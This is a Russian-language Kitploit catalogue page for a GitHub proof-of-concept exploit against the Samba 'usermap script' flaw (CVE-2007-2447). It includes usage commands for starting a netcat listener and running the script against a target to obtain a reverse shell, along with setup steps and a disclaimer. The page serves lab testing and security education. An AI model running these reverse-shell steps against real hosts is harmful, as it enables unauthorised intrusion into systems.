Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2007-2447 — Proof-of-concept эксплойт для удаленного выполнения команд через usermap script в Samba (CVE-2007-2447), с возможностью обратной оболочки для контролируемого лабораторного тестирования и исследований в области безопасности. | Kitploit
Инструменты/GitHubGitHub/abdulsaabir/cve-2007-2447
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubabdulsaabir/cve-2007-2447

CVE-2007-2447

Proof-of-concept эксплойт для удаленного выполнения команд через usermap script в Samba (CVE-2007-2447), с возможностью обратной оболочки для контролируемого лабораторного тестирования и исследований в области безопасности.

Репозиторий
128 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2007-2447

PoC: Samba "usermap script" удаленное выполнение команд (исторический CVE). Этот репозиторий содержит небольшой концептуальный скрипт для исследовательских и образовательных целей. Основной скрипт — usermap_script_Command_Execution.py.

Ссылка на статью: https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

Использование

Клонируйте репозиторий и запустите скрипт в контролируемой лабораторной среде. PoC опционально использует reverse shell обратно на LHOST:LPORT — запустите ваш слушатель перед запуском скрипта и убедитесь, что зависимости установлены (см. Установка).

root@kitploit:~
git clone https://github.com/abdulsaabir/CVE-2007-2447.git
cd CVE-2007-2447
# ensure dependencies are installed (see Installation), then start a listener on your LHOST:LPORT
# example using netcat with a placeholder port:
nc -lnvp <LPORT>
# in another terminal, run the PoC against the lab target:
python3 usermap_script_Command_Execution.py <RHOST> 139 <LHOST> <LPORT>

Параметры

  • RHOST — целевой IP или имя хоста
  • RPORT — целевой TCP порт (обычно 139)
  • LHOST — IP слушателя для обратного соединения
  • LPORT — порт слушателя
  • Установка

    Рекомендуется: создайте изолированное виртуальное окружение Python и установите зависимости из requirements.txt перед запуском скрипта.

    root@kitploit:~
    python3 -m venv exploit_env
    source exploit_env/bin/activate
    pip install -r requirements.txt
    

    Безопасность и отказ от ответственности

    Этот код предоставлен только для законных исследований в области безопасности, образования и защитного тестирования. Не запускайте этот скрипт против любой системы, которой вы не владеете или на тестирование которой у вас нет явного письменного разрешения. Неправильное использование может привести к юридическим последствиям; владелец репозитория не несет ответственности за неправильное использование.

    Всегда предпочитайте статический анализ кода и контролируемое лабораторное тестирование (снимки ВМ, изолированные сети и захват пакетов) при анализе потенциально опасного кода.

    Если вы хотите получить неисполняемый аннотированный пошаговый разбор или requirements.txt, откройте issue или запросите его здесь.

    Скачать инструмент